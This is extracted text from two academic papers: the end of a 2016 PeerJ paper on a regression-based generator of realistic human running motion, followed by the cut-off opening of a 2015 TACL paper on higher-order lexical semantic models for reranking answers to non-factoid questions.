retain was a critical issue in the exploratory factor analysis. To perform this decision we used the methodology of Parallel Analysis (PA) (Hayton, Allen & Scarpello, 2004). PA is a Monte-Carlo based simulation method that compares the observed eigenvalues (components) with those obtained from randomized normal variables. A component is retained if its explained variance or information is higher than the information provided by the eigenvectors derived from the random data. 5-Regression model: one of the objectives of our work was to generate a statistical model capable of synthetizing new realistic running motion from a set of desired data: age, gender, height, weight and velocity, also called 1D data. Accordingly, to devise the Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 6/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 bio-motion generator, we needed to establish the correlation between the 1D data and PCA scores, which provide the signature of each motion. The correlation was obtained as a regression model, combining a partial least squares (PLS) regression model as a first step and a linear regression model (LRM) as a second step. PLS methodology is explained in Wold (2006) and Geladi & Kowalski (1986). This type of regression model is suitable for the kind of data involved in the bio-motion generator since the input data of the model is strongly correlated (anthropometrical information). The PLS regression model takes the 1D data—age, height, weight and velocity—as input information and produces a set of PCA scores as output. The LRM model was applied to these output PCA scores to reflect the influence of gender in the PCA scores. In the first step, we estimated a PLS model considering anthropometrical data and velocity of the movement as independent variables and the PCA scores as dependent variables. The general formula of a PLS model is: Y −Y0=B·(X−X0)+E (3) where Y is the matrix of dependent variables, X is the matrix of independent variables, X0 and Y0 are the matrices of mean data, B is the coefficient matrix of the PLS model and E is the prediction error matrix. Havingfourdifferent1Dmeasurementsforeachsubjectxi=[age,height,weight,velocity], we built a 105 × 4 matrix X formed by the concatenation of the vectors xi. Notice that since matrix =α , it is constituted by PCA scores and the mean matrix Y0 is the zero matrix. Finally, we estimated the coefficient matrix B from sample data X and α with the PLS algorithm and substituted in the equation above, obtaining the following model: α=B·(X−X0)+E. (4) Where X0 is the matrix of mean anthropometrical data and velocity, and E is the prediction error matrix. PLS decomposes the independent and dependent variables in component spaces in order to obtain their correlation. The number of significant PLS components in the model was selected in a leave-one-out procedure and according to the explained variance (R2) criteria. Secondly, the influence of gender was modelled with a LRM of the prediction error matrix E with coefficients a = (a1,...,ac) and b = (b1,...,bc), where c is the number of retained PCA components: Ê =a+b·gender (5) where gender =0 for men and gender =1 for women. This way, the motion information related to gender which is part of the PLS error matrix E, and uncorrelated with the prediction derived from the PLS regression, was modelled. Notice that aj and bj were considered zero whenever their F-value was below a desired level of statistical significance of 95%. Once we have obtained B, a and b, whenever we want to synthesize a running motion from new anthropometrical data and velocity, we obtain the corresponding scores α̂ of the Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 7/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 new realistic running motion by the following formula: α̂=[a−B·X0]+ [ B b ] · [ X gender ] (6) where X0 is the matrix of mean anthropometrical data and velocity. Validation methodology of the bio-motion generator To validate the five-step methodology described to develop the bio-motion generator we propose a comparison between each recorded observation and the prediction of running motion generated by the model by means of the ‘leave-one-out’ procedure. The recorded observation is considered the true angle curve of the running motion. The predicted motion is estimated using the ‘leave-one-out’ validation technique; that is, not including that observation in the bio-motion generator. We wish to determine if both curves are reproducible and sufficiently similar to consider that they represent the same motion. For this purpose, we use the Intraclass Correlation Coefficient (ICC) as a measurement of the reliability, and the Standard Error of Measurement (SEM) as a direct measurement of the global error between true and predicted angles. Theoretically, the ICC is defined as the ratio between the true variance and the predicted variance. The ICC varies between 0 and 1 and can be interpreted as the proportion of variance due to the methodology (true versus predicted data) in the total variance. An ICC greater than 0.8 is generally considered to be good (Fleiss, 1999). The ICC is determined between the measured or true curve (Tc) and the estimated curve (Ec) provided by the bio-motion generator. The ICC is determined from the variance of both curves (Tc) and (Ec) following the next equation: ICC= σ2Ec (σ2Tc +σ 2 Ec ) ; (7) On the other hand, SEM represents the existent difference between observed (Tc) and estimated curves (Ec) determined with the bio-motion generator, and provide an indication of the real magnitude of the error. SEM=σc · √ (1−ICC); (8) Where σc is the combined standard deviation of the true scores (Tc) and observed scores (Ec). And SE is the combined standard deviation of the true scores and observed scores. We have obtained the SEM for each pair of true and predicted angles for the three spatial directions in all the joints that form the human model. For that reason, we have represented the SEM by its descriptive statistics (mean, std., 5-percentile and 95-percentile). RESULTS Parallel analysis The results of the PA (Fig. 2) have been obtained with the explained variance of the main components extracted from the original data and the same obtained from randomized Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 8/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 Number of principal components 0 10 20 30 40 50 60 70 80 90 E xp la in e d v a ri a n ce ( % ) 0 5 10 15 20 25 30 35 40 Original data Random data Figure 2 Relation between the explained variance and the number of principal components extracted from the database and from randomized data. data. The intersection point of both curves indicates the optimal number of components to extract from the PCA. The original number of dimensions was 72 (3 related to the pelvis translation + 69 related to the body segments orientation). The results of the PA recommend retaining the first 12 eigenvalues, which explain the 88.16% of the total variance. Thus, the PCA allowed a percentage of data reduction of 83%, from 72 variables to 12 weighed components. Regression model As it has been explained in the methodology, the regression model consists of two parts, the first including the anthropometrical data (PLS) and the second the gender (LRM). The dependent variables of the PLS are the scores of the first 12 principal components (PC) of the kinematical running motion. Therefore, they are uncorrelated and the optimal number of PLS components are separately determined for each PC score (PC 1... PC 12) according to its adjusted R2 plot (Fig. 3). PLS components are retained until their R2 curve exhibits a decrease or a non-significant increase. Thus, for instance, two PLS components are retained for PC 1, whereas no components are considered for PC 7 and PC 9. Notice that for those PC with 0 retained components, the PLS model provides their mean value as output. This way, the motion information associated to those PC which is provided by the PLS model is the average motion. With regard to the LRM, which analyses the influence of gender in the kinematics of running, the PCA scores which are significantly affected by gender are PC3, PC7, PC8, PC9 and PC11 (Table 2). The prediction obtained in the first step of the model is improved by the influence of gender on these PC. PC 7 and PC 9 are only affected by gender, since their number of retained PLS components was 0. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 1 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 2 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 3 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 4 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 5 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 6 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 7 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 8 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 9 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 10 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 11 Number of PLS components R −S qu ar ed 0 1 2 3 4 5 −0 .1 0. 1 0. 3 0. 5 PC 12 Number of PLS components R −S qu ar ed Figure 3 Leave-one-out R2 estimation plots for the PLS model. Validation of the bio-motion generator The results of the reliability study, computed from the 90 observations and the same calculated by means of the leave-one-out technique, showed that the mean and standard deviation of ICC, was 0.91(0.04) with a 5 percentile of 0.829 and 95 percentile of 0.971. Only one subject exhibit an ICC lower than 0.8 in two observations (Fig. 4). The SEM between the real and the predicted angles determined with the leave-one-out model showed a mean (std.) of 4.16◦ (6.80◦), with a 5 percentile of 0.41◦ and 95 percentile of 14.23◦ (Fig. 5). DISCUSSION In this paper we have demonstrated that the five-step methodology on which the bio-motion generator is based provides running motion models closely resembling the measurements obtained with real subjects. However, while the SEM study shows that the vast majority of errors detected between actual and predicted data of the bio-motion generator are less than 10◦, there are a percentage of observations (8%) in which greater errors are observed. This can be explained because the model has been obtained from a small number of subjects—only 18—and therefore the bio-motion generator is not able to adjust the running specific characteristics of each corridor. Future work in this line of research Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 Table 2 ANOVA table for the linear models. Df Sum Sq Mean Sq F-value Pr (>F) Gender 1 214117 214117 1.092 0.298 PC1 Residuals 103 20188135 196001 Gender 1 140256 140256 2.687 0.104 PC2 Residuals 103 5377216 52206 Gender 1 259962 259962 5.592 0.0199 * PC3 Residuals 103 4788029 46486 Gender 1 6242 6242 0.14 0.709 PC4 Residuals 103 4591853 44581 Gender 1 79045 79045 3.434 0.0667 PC5 Residuals 103 2370796 23017 Gender 1 2470 2470 0.125 0.724 PC6 Residuals 103 2028601 19695 Gender 1 81973 81973 4.361 0.0392 * PC7 Residuals 103 1935909 18795 Gender 1 88710 88710 7.979 0.00568 ** PC8 Residuals 103 1145086 11117 Gender 1 62331 62331 4.962 0.0281 * PC9 Residuals 103 1293890 12562 Gender 1 3246 3246 0.355 0.552 PC10 Residuals 103 940560 9132 Gender 1 111297 111297 13.31 0.000417 *** PC11 Residuals 103 861467 8364 Gender 1 1373 1373 0.29 0.591 PC12 Residuals 103 487860 4737 Notes. Signification codes 0.001 ‘***’; 0.01 ‘**’; 0.05 ‘*’. must be done to increase the database of real subjects measured and incorporate greater variability in anthropometric and performance characteristics. The bio-motion generator is based on a methodology which comprises five steps. In the fourth step we tackle a dimensionality reduction based on PCA. This step is similar to that performed by Troje (2002). However, there are some differences, as he obtained four main components that explain more than 98% of the variance and we have obtained 12 components explaining 88.16% of variance. The greater variability of our study is explained partly by the greater variability of the running against walking and on the other hand by the greater speed range in our study in relation to Troje, in which each subject could select a single comfortable walking speed. On the other hand, Troje made a second reduction of the dimensionality based on the simplicity of temporal behaviour of the walking components which could be modelled with pure sine functions with a scaled fundamental frequency. This approach was not valid for the motion of running, due to the fact that the 12 PCs of running cannot be modelled with a proportional frequency. This suggests that running is a more complex motion than walking in the sense that there does not exist a proportion between the frequency of oscillation of the different body segments. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 11/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 Figure 4 Frequency histogram of the ICC. SEM 0 10 20 30 40 50 60 70 80 90 100 F re q u e n cy 0 200 400 600 800 1000 1200 1400 1600 1800 2000 Figure 5 Frequency histogram of the SEM. The fifth step of the methodology consists of a two-step linear regression which correlates a given list of 1D measurements with the PCA scores of movement. A linear regression technique has been used before to approximate motion models from a reduced marker set and estimate the remaining markers (Liu et al., 2005) or to model the motion-style and the spatio-temporal movement (Torresani, Hackney & Bregler, 2006). However, it has not been used before to synthesize new human motion directly from a set of anthropometrical and performance data. In this sense, it can be considered a real breakthrough in the field of synthesis of human motion. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 Figure 6 Reconstructed virtual biomechanical model (skeleton+motion). CONCLUSIONS The major contribution of this paper is a novel statiscal methodology for modelling human movements. The method described in this article has been developed and validated for running motion, but this same methodology could be used to synthesize other types of motion: walking, going up and down stairs, or even for sport movements such as: jumping, pedalling, golf swing and putting, etc. Our work aims to provide a realistic motion to body shapes that can be developed with the methodology described in the work of Ballester et al. (2014). Those body shapes could include an adjusted skeleton formed by a hierarchical set of interconnected joints and can be used to move the body shape with the required or desired motion provided by our methodology (Fig. 6). The integration of both methods will allow generating realistic avatars supplied with realistic motion from a set of adjustable and simple anthropometrical and performance data and without the need of the realization of new measurements. A limitation of this study is the sample size. Further work needs to be done in order to validate with a broader sample of people. Notwithstanding this limitations, the findings suggest that the model is valid. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research for this paper was done within the EASY-IMP project (http://www.easy- imp.eu/) funded by the European Commission FP7.FoF.NMP.2013-5 Project 609078. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 13/16 https://peerj.com http://www.easy-imp.eu/ http://www.easy-imp.eu/ http://dx.doi.org/10.7717/peerj-cs.102 Grant Disclosures The following grant information was disclosed by the authors: European Commission: FP7.FoF.NMP.2013-5 Project 609078. Competing Interests The authors declare there are no competing interests. Author Contributions • José María Baydal-Bertomeu conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • Juan Vicente Juan V. Durá-Gil conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Ana Piérola-Orcero analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • Eduardo Parrilla Bernabé prepared figures and/or tables, performed the computation work. • Alfredo Ballester and Sandra Alemany-Mut reviewed drafts of the paper. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): Ethics Committee. Universitat Politècnica of Valencia. Data Availability The following information was supplied regarding data availability: The raw data has been supplied as Supplementary File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.102#supplemental-information. REFERENCES Ballester A, Parrilla E, Uriel J, Pierola A, Alemany S, Nacher B, Gonzalez J, Gonzalez JC. 2014. 3D-based resources fostering the analysis, use, and exploitation of available body anthropometric data. In: 5th international conference on 3D body scanning technologies. Biewener AA, Farley CT, Roberts TJ, Temaner M. 2004. Muscle mechanical advantage of human walking and running: implications for energy cost. Journal of Applied Physiology 97(6):2266–2274 DOI 10.1152/japplphysiol.00003.2004. Bruderlin A, Williams L. 1995. Motion signal processing. In: Proceedings of the 22nd annual conference on computer graphics and interactive techniques. ACM, 97–104. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 14/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102/supplemental-information http://dx.doi.org/10.7717/peerj-cs.102#supplemental-information http://dx.doi.org/10.7717/peerj-cs.102#supplemental-information http://dx.doi.org/10.1152/japplphysiol.00003.2004 http://dx.doi.org/10.7717/peerj-cs.102 Davis J, Bobick A, Richards W. 2000. Categorical representation and recognition of oscillatory motion patterns. In: Proceedings of the IEEE conference on com- puter vision and pattern recognition, 2000, vol. 1. Piscataway: IEEE, 628–635 DOI 10.1109/CVPR.2000.855878. Dvorak J, Antinnes JA, Panjabi M, Loustalot D, Bonomo M. 1992. Age and gender related normal motion of the cervical spine. Spine 17(10 Suppl):S393–S398 DOI 10.1097/00007632-199210001-00009. Feipel V, Rondelet B, LePallec JP, DeWitte O, Rooze M. 1999. The use of dishar- monic motion curves in problems of the cervical spine. International Orthopaedics 23(4):205–209 DOI 10.1007/s002640050351. Fleiss JL. 1999. The design and analysis of clinical experiments. New York: Wiley. Geladi P, Kowalski BR. 1986. Partial least-squares regression: a tutorial. Analytica Chimica Acta 185(January):1–17 DOI 10.1016/0003-2670(86)80028-9. Hayton JC, Allen DG, Scarpello V. 2004. Factor retention decisions in exploratory factor analysis: a tutorial on parallel analysis. Organizational Research Methods 7(2):191–205 DOI 10.1177/1094428104263675. Johansson G. 1973. Visual perception of biological motion and a model for its analysis. Perception & Psychophysics 14(2):201–211 DOI 10.3758/BF03212378. Kajita S, Kanehiro F, Kaneko K, Fujiwara K, Yokoi K, Hirukawa H. 2002. A realtime pattern generator for biped walking. In: Proceedings of the IEEE international conference on robotics and automation, 2002, vol. 1. Piscataway: IEEE, 31–37 DOI 10.1109/ROBOT.2002.1013335. Li Y, Wang T, Shum H-Y. 2002. Motion texture: a two-level statistical model for character motion synthesis. In: ACM transactions on graphics (ToG), vol. 21. New York: ACM, 465–472. Liu G, Zhang J, Wang W, McMillan L. 2005. A system for analyzing and indexing human-motion databases. In: Proceedings of the 2005 ACM SIGMOD international conference on management of data. New York: ACM, 924–926. Meredith M, Maddock S. 2001. Motion capture file formats explained. Department of Computer Science, University of Sheffield, Sheffield. Available at http://www.dcs. shef.ac.uk/intranet/research/public/resmes/CS0111.pdf . Mills PM, Morrison S, Lloyd DG, Barrett RS. 2007. Repeatability of 3D gait kinematics obtained from an electromagnetic tracking system during treadmill locomotion. Journal of Biomechanics 40(7):1504–1511 DOI 10.1016/j.jbiomech.2006.06.017. Novacheck TF. 1998. The biomechanics of running. Gait & Posture 7(1):77–95 DOI 10.1016/S0966-6362(97)00038-6. Pandy MG. 2001. Computer modeling and simulation of human movement. Annual Re- view of Biomedical Engineering 3(1):245–273 DOI 10.1146/annurev.bioeng.3.1.245. Thies SB, Tresadern P, Kenney L, Howard D, Goulermas JY, Smith C, Rigby J. 2007. Comparison of linear accelerations from three measurement systems during ‘‘reach & grasp". Medical Engineering and Physics 29(9):967–972 DOI 10.1016/j.medengphy.2006.10.012. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 15/16 https://peerj.com http://dx.doi.org/10.1109/CVPR.2000.855878 http://dx.doi.org/10.1097/00007632-199210001-00009 http://dx.doi.org/10.1007/s002640050351 http://dx.doi.org/10.1016/0003-2670(86)80028-9 http://dx.doi.org/10.1177/1094428104263675 http://dx.doi.org/10.3758/BF03212378 http://dx.doi.org/10.1109/ROBOT.2002.1013335 http://www.dcs.shef.ac.uk/intranet/research/public/resmes/CS0111.pdf http://www.dcs.shef.ac.uk/intranet/research/public/resmes/CS0111.pdf http://dx.doi.org/10.1016/j.jbiomech.2006.06.017 http://dx.doi.org/10.1016/S0966-6362(97)00038-6 http://dx.doi.org/10.1146/annurev.bioeng.3.1.245 http://dx.doi.org/10.1016/j.medengphy.2006.10.012 http://dx.doi.org/10.7717/peerj-cs.102 Torresani L, Hackney P, Bregler C. 2006. Learning motion style synthesis from percep- tual observations. In: Advances in neural information processing systems. Cambridge: MIT Press, 1393–1400. Troje NF. 2002. Decomposing biological motion: a framework for analysis and synthesis of human gait patterns. Journal of Vision 2(5):371–387 DOI 10.1167/2.5.2. Troje N. 2008. Retrieving information from human movement patterns. In: Thomas FS, Zacks JM, eds. Understanding events: from perception to action. Oxford: Oxford University Press, 308–335. Ullah S, Finch CF. 2013. Applications of functional data analysis: a systematic review. BMC Medical Research Methodology 13:43 DOI 10.1186/1471-2288-13-43. Vasilescu MAO. 2002. Human motion signatures: analysis, synthesis, recognition. In: Proceedings of the 16th international conference on pattern recognition, vol. 3. Piscataway: IEEE, 456–460. Vinué G, León T, Alemany S, Ayala G. 2014. Looking for representative fit models for apparel sizing. Decision Support Systems 57(January):22–33 DOI 10.1016/j.dss.2013.07.007. Wold H. 2006. Partial least squares. In: Samuel K, Read CB, Balakrishnan N, Vidakovic B, Johnson NL, eds. Encyclopedia of statistical sciences. Hoboken: John Wiley & Sons, Inc. Zhang J-T, Novak AC, Brouwer B, Li Q. 2013. Concurrent validation of Xsens MVN measurement of lower limb joint angular kinematics. Physiological Measurement 34(8):63–69 DOI 10.1088/0967-3334/34/8/N63. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 16/16 https://peerj.com http://dx.doi.org/10.1167/2.5.2 http://dx.doi.org/10.1186/1471-2288-13-43 http://dx.doi.org/10.1016/j.dss.2013.07.007 http://dx.doi.org/10.1088/0967-3334/34/8/N63 http://dx.doi.org/10.7717/peerj-cs.102 work_ovcflywu7jf77iwsxybgfrw4tm ---- Higher-order Lexical Semantic Models for Non-factoid Answer Reranking Daniel Fried1, Peter Jansen1, Gustave Hahn-Powell1, Mihai Surdeanu1, and Peter Clark2 1 University of Arizona, Tucson, AZ, USA 2 Allen Institute for Artificial Intelligence, Seattle, WA, USA {dfried,pajansen,hahnpowell,msurdeanu}@email.arizona.edu peterc@allenai.org Abstract Lexical semantic models provide robust performance for question answering, but, in general, can only capitalize on direct ev- idence seen during training. For example, monolingual alignment models acquire term alignment probabilities from semi- structured data such as question-answer pairs; neural network language models learn term embeddings from unstructured text. All this knowledge is then used to estimate the semantic similarity between question and answer candidates. We in- troduce a higher-order formalism that al- lows all these lexical semantic models to chain direct evidence to construct indirect associations between question and answer texts, by casting the task as the traversal of graphs that encode direct term associa- tions. Using a corpus of 10,000 questions from Yahoo! Answers, we experimentally demonstrate that higher-order methods are broadly applicable to alignment and lan- guage models, across both word and syn- tactic representations. We show that an important criterion for success is control- ling for the semantic drift that accumu- lates during graph traversal. All in all, the proposed higher-order approach improves five out of the six lexical semantic mod- els investigated, with relative gains of up to +13% over their first-order variants. 1 Introduction Open-domain question answering (QA), which finds short textual answers to natural language questions, is often viewed as the successor to key- word search (Etzioni, 2011) and one of the most difficult and widely applicable end-user applica- tions of natural language processing (NLP). From syntactic parsing, discourse processing, and lex- ical semantics, QA necessitates a level of func- tionality across a variety of topics that make it a natural, yet challenging, proving ground for many aspects of NLP. Here, we address a partic- ularly challenging QA subtask: open-domain non- factoid QA, where queries take the form of com- plex questions (e.g., manner or How questions), and answers range from single sentences to en- tire paragraphs. Because this task is so complex and large in scope, current state-of-the-art open- domain systems perform at only about 30% P@1, or answering roughly one out of three questions correctly (Jansen et al., 2014). In this paper we focus on answer ranking (AR), a key component of non-factoid QA that focuses on ordering candidate answers based on the like- lihood that they capture the information needed to answer a question. Unlike keyword search, Berger (2000) observed that lexical matching methods are generally insufficient for QA, where questions and answers often have little to no lexical overlap (as in the case of Where should we go for breakfast? and Zoe’s Diner has great pancakes). Previous work has shown that lexical semantics (LS) mod- els are well suited to bridging this “lexical chasm”, and at least two flavors of lexical semantics have been successfully applied to QA. The first treats QA as a monolingual alignment problem, learning associations between words (or other structures) that appear in question-answer pairs (Surdeanu et al., 2011; Yao et al., 2013). The second computes the semantic similarity between question and an- swer using language models acquired from rele- vant texts (Yih et al., 2013; Jansen et al., 2014). Here we argue that while these models begin to bridge the “lexical chasm”, many still suffer from sparsity and only capitalize on direct evi- dence. Returning to our example question, if we also train on the QA pair What goes well with pan- cakes? and hashbrowns and toast, we can use the 197 Transactions of the Association for Computational Linguistics, vol. 3, pp. 197–210, 2015. Action Editor: Sharon Goldwater. Submission batch: 12/2014; Revision batch 3/2015; Published 4/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. Figure 1: A hypothetical graph derived from a lexical se- mantic alignment model. indirect association between breakfast – pancakes and pancakes – hashbrowns to locate additional answers for where to visit for breakfast, including Regee’s has the best hashbrowns in town. We can represent LS models as a graph, as in Figure 1. For a word-based alignment model, the graph nodes represent individual words, and the (directed) edges capture the likelihood of a word wa appearing in a gold answer given word wq in the question. Grounding this in our example, w1 may represent breakfast, w2 pancakes, and w4 hashbrowns. For a language model, the edges cap- ture the similarity of contexts between the words in the nodes. For both alignment and language model graphs, we observe that semantic associa- tion between two words (or structures) stored in the nodes can be determined by investigating the different paths that connect these two nodes, even when they are not directly connected. We call this class of models higher-order lexical models, in contrast to the first-order lexical mod- els introduced in previous work, which rely only on direct evidence to estimate association strength. For example, all alignment models in previous work can estimate P(wq|wa), i.e., the probabil- ity of generating the question word wq if the an- swer contains the word wa, only if this pair has been seen at least once in training. On the other hand, our approach can estimate P(wq|wa) from indirect evidence, e.g., from chaining two distinct question/answer pairs that contain the words (wq, wi) and (wi, wa), respectively. The contributions of this work are: 1. This is the first work to our knowledge that proposes higher-order LS models for QA. We show that an important criterion for success is controlling for the semantic drift that ac- cumulates in the graph traversal paths, which plagues traditional random walk algorithms. For example, we empirically demonstrate that paths up to a length of three are gener- ally beneficial, but longer paths hurt or do not improve performance. 2. We show that a variety of LS models and representations, including alignment and lan- guage models, over both words and syntac- tic structures, can be adapted to the proposed higher-order formalism. In this latter respect we introduce a novel syntax-based variant of the neural network language model (NNLM) of Mikolov et al. (2013) that models syntac- tic dependencies rather than words, which al- lows it to capture knowledge that is comple- mentary to that of word-based NNLMs. 3. The training process for alignment models requires a large corpus of QA pairs. Due to these resource requirements, we evaluate our higher-order LS models on a commu- nity question answering (CQA) task (Wang et al., 2009; Jansen et al., 2014) across thousands of how questions, and show that most higher-order models perform signifi- cantly better than their first-order variants. 4. We demonstrate that language models and alignment models capture complementary in- formation, and can be combined to improve the performance of the CQA system for man- ner questions. 2 Related Work We focus on statistical LS methods for open- domain QA, in particular CQA tasks, such as the ones driven by Yahoo! Answers datasets (Wang et al., 2009; Jansen et al., 2014). Berger et al. (2000) were the first to propose a statistical LS model to “bridge the lexical chasm” between questions and answers for a QA task. Building off this work, a number of LS models us- ing either words or other syntactic and semantic structures have been proposed for QA (Echihabi and Marcu, 2003; Soricut and Brill, 2006; Rie- zler et al., 2007; Surdeanu et al., 2011; Yao et al., 2013; Jansen et al., 2014), or related tasks, such as semantic textual similarity (Sultan et al., 2014). However, all of these models fall into the class of first-order models. To our knowledge, this work is the first to investigate higher-order LS models for QA, which can take advantage of indirect ev- idence, i.e., the “neighbors of neighbors” in the association graph. 198 Second-order lexical models have recently been brought to bear on a variety of other NLP tasks. Zapirain et al. (2013) use a second-order model based on distributional similarity (Lin, 1998) to improve a selectional preference model, and Lee et al. (2012) use a similar approach for coreference resolution. Our work expands on these ideas with models of arbitrary order, an approach to control semantic drift, and an application to QA. This work falls under the larger umbrella of algorithms for graph-based inference, which have been successfully applied to other NLP and information retrieval problems, such as rela- tion extraction (Chakrabarti and Agarwal, 2006; Chakrabarti, 2007; Lao and Cohen, 2010), in- ference over knowledge bases (Lao et al., 2011), name disambiguation (Minkov et al., 2006), and search (Bhalotia et al., 2002; Tong et al., 2006). While many of these approaches use random walk algorithms, in pilot experiments we observed that random walks, such as PageRank (PR) (Page et al., 1999), tend to accumulate semantic drift from the originating node because they consider all possi- ble paths in the graph. This semantic drift reduces the quality of the higher-order associations, which impacts QA performance. Here we implement a conservative graph traversal algorithm, similar in spirit to the “cautious bootstrapping” algorithm of Yarowsky (Whitney and Sarkar, 2012; Yarowsky, 1995). By constraining the traversal paths, our al- gorithm runs two orders of magnitude faster than PR, while controlling for semantic drift. 3 Approach The architecture of our proposed QA framework is illustrated in Figure 2. Here we evaluate both first- order and higher-order LS models in the context of community question answering (CQA), using a large dataset of QA pairs from Yahoo! Answers1. We use a standard CQA evaluation task (Jansen et al., 2014), where one must rank a set of user- generated answers to a given question, such that the community-selected best answer appears in the top position. More specifically, for a given question, the candidate retrieval (CR) component fetches all its community-generated answers from the answer collection, and gives each answer can- didate an initial ranking using shallow informa- 1 http://answers.yahoo.com Figure 2: Architecture of the reranking framework for QA, showing a reranking component that incorporates two classes of lexical semantic models (alignment and neural network language models), implemented over two representations of content (words and syntax). tion retrieval scoring.2 These answer candidates are then passed on to the answer reranking com- ponent, the focus of this work. The answer reranking (AR) component ana- lyzes the answer candidates using more expensive techniques to extract first-order and higher-order LS features, and these features are then used in concert with a learning framework to rerank the candidates and elevate correct answers to higher positions. For the learning framework, we use SVMrank, a variant of Support Vector Machines for structured output adapted to ranking prob- lems.3 In addition to these features, each reranker also includes a single feature containing the score of each candidate, as computed by the above can- didate retrieval component.4 4 First-Order Lexical Models We next introduce a series of first-order LS mod- els, which serve as the foundation for the higher- order models discussed in the next section. 4.1 Neural Network Language Models Inspired by previous work (Yih et al., 2013; Jansen et al., 2014), we adapt the word2vec NNLM of 2We used the same scoring as Jansen et al. (2014): co- sine similarity between the question and candidate answer’s lemma vector representations, with lemmas weighted using tf.idf (Ch. 6, (Manning et al., 2008)). 3 http://www.cs.cornell.edu/people/tj/ svm_light/svm_rank.html 4Including these scores as features in the reranker model is a common strategy that ensures that the reranker takes ad- vantage of the analysis already performed by the CR model. 199 http://answers.yahoo.com http://www.cs.cornell.edu/people/tj/svm_light/svm_rank.html http://www.cs.cornell.edu/people/tj/svm_light/svm_rank.html Mikolov et al. (2013) to this QA task. In particu- lar, we use their skip-gram model with hierarchi- cal sampling. This model predicts the context of a word given the word itself, and through this pro- cess embeds words into a latent conceptual space with a fixed number of dimensions. Consequently, related words tend to have vector representations that are close to each other in this space. This type of predictive algorithm has been found to perform considerably better than count-based approaches to distributional similarity on a variety of seman- tic tasks (Baroni et al., 2014). We derive four LS measures from these vec- tors, which are then are included as features in the reranker. The first is a measure of the over- all similarity of the question and answer candi- date, which is computed as the cosine similarity between two composite vectors. These composite vectors are assembled by summing the vectors for individual question (or answer candidate) words, and re-normalizing this composite vector to unit length.5 In addition to this overall similarity score, we compute the pairwise similarities between each word in the question and answer candidates, and include as features the average, minimum, and maximum pairwise similarities. 4.2 Alignment Models Berger et al. (2000) showed that learning question- to-answer transformations using a statistical ma- chine translation (SMT) model begins to “bridge the lexical chasm” between questions and an- swers. We build upon this observation, using the IBM Model 1 (Brown et al., 1993) variant of Sur- deanu et al. (2011) to determine the probability that a question Q is a translation of an answer A, P(Q|A): P(Q|A) = ∏ q∈Q P(q|A) (1) P(q|A) = (1−λ)Pml(q|A) + λPml(q|C) (2) Pml(q|A) = ∑ a∈A (T(q|a)Pml(a|A)) (3) where the probability that the question term q is generated from answer A, P(q|A), is smoothed using the prior probability that the term q is gen- erated from the entire collection of answers C, Pml(q|C). Pml(q|A) is computed as the sum of 5We also tried the multiplicative strategy for word-vector combination of Levy and Goldberg (2014b), but it did not improve our results. the probabilities that the question term q is a trans- lation of any answer term a, T(q|a), weighted by the probability that a is generated from A. The translation table for T(q|a) is computed us- ing GIZA++ (Och and Ney, 2003). Similar to Surdeanu et al. (2011) we: (a) set Pml(q|C) to a small value for out-of-vocabulary words; (b) modify the T(.|.) distributions to guar- antee that the probability of translating a word to itself, i.e., T(w|w), is highest (Murdock and Croft, 2005); and (c) tune the smoothing parameter λ on a development corpus. QA systems generally use the above model to determine the global alignment probability be- tween a given question and answer candidate, P(Q|A). A novel contribution of our work is that we also use the alignment model’s proba- bility distributions (from a 